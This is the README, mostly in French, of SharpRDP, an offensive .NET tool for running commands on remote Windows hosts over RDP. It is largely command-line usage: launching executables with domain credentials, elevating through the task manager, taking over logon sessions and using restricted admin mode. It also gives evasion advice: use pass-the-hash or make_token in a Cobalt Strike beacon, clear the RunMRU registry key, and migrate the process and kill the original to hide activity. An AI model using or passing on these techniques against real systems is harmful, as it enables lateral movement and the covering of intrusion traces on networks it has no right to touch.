
Application console .NET du protocole de bureau à distance pour l'exécution de commandes authentifiées
Pour compiler, ouvrez le projet dans Visual Studio et générez en mode Release. Deux DLL seront produites dans le répertoire Release, vous n'en avez pas besoin car les DLL sont dans l'assembly.
Si vous ne souhaitez pas utiliser les DLL fournies, vous aurez besoin du kit de développement .NET pour créer la DLL AxMSTSCLib.dll. Pour la créer, vous devrez exécuter aximp depuis le kit de développement sur mstscax.dll. %<SDK dir>%\aximp.exe %windir%\system32\mstscax.dll. Ces DLL devront être référencées par le projet pour que les DLL Interop soient créées.
Vous devrez également compresser les DLL avec Deflate et les nommer AxInterop.MSTSCLib.dll.bin et Interop.MSTSCLib.dll.bin
Regular RDP connection and execution
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
Exec program as child process of cmd or powershell
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password exec=cmd
Use restricted admin mode
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe"
Connect first host drives
SharpRDP.exe computername=domain.target command="\\tsclient\C\Temp\file.exe" username=domain\user password=password connectdrive=true
Execute command elevated through Run Dialog - CURRENTLY BUGGED
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe" username=domain\user password=password elevated=winr
Execute command elevated through task manager
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe\" username=domain\user password=password elevated=taskmgr
Add Network Level Authentication
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe\" username=domain\user password=password nla=true
Ask to take over logon session
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe\" username=domain\user password=password takeover=true
Si le mode administrateur restreint est activé sur la cible, ne spécifiez aucune information d'identification et il utilisera le contexte utilisateur actuel. Vous pouvez utiliser PTH ou make_token dans beacon ou runas /netonly sur un système Windows.
Toute exécution commence par la boîte de dialogue Exécuter de Windows (Win+R). Une clé de registre sera créée à l'emplacement HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU avec la commande que vous avez exécutée. Si vous souhaitez la supprimer, vous pouvez utiliser : CleanRunMRU: Obtenir ou effacer les valeurs RunMRU
Gardez à l'esprit que si vous exécutez un programme comme msbuild (je suis sûr qu'il y en a d'autres), une fenêtre cmd apparaîtra pendant l'exécution du processus. Si cela se produit, il serait probablement préférable de migrer le processus et de tuer l'original.
Les DLL requises sont compilées dans l'assembly et l'événement de résolution d'assembly du domaine d'application est utilisé. En raison de la taille des DLL, elles sont compressées et décompressées à l'exécution (afin de respecter la limite de taille de 1 Mo de beacon).
Blog à ce sujet trouvé ici SharpRDP
Également inclus dans MoveKit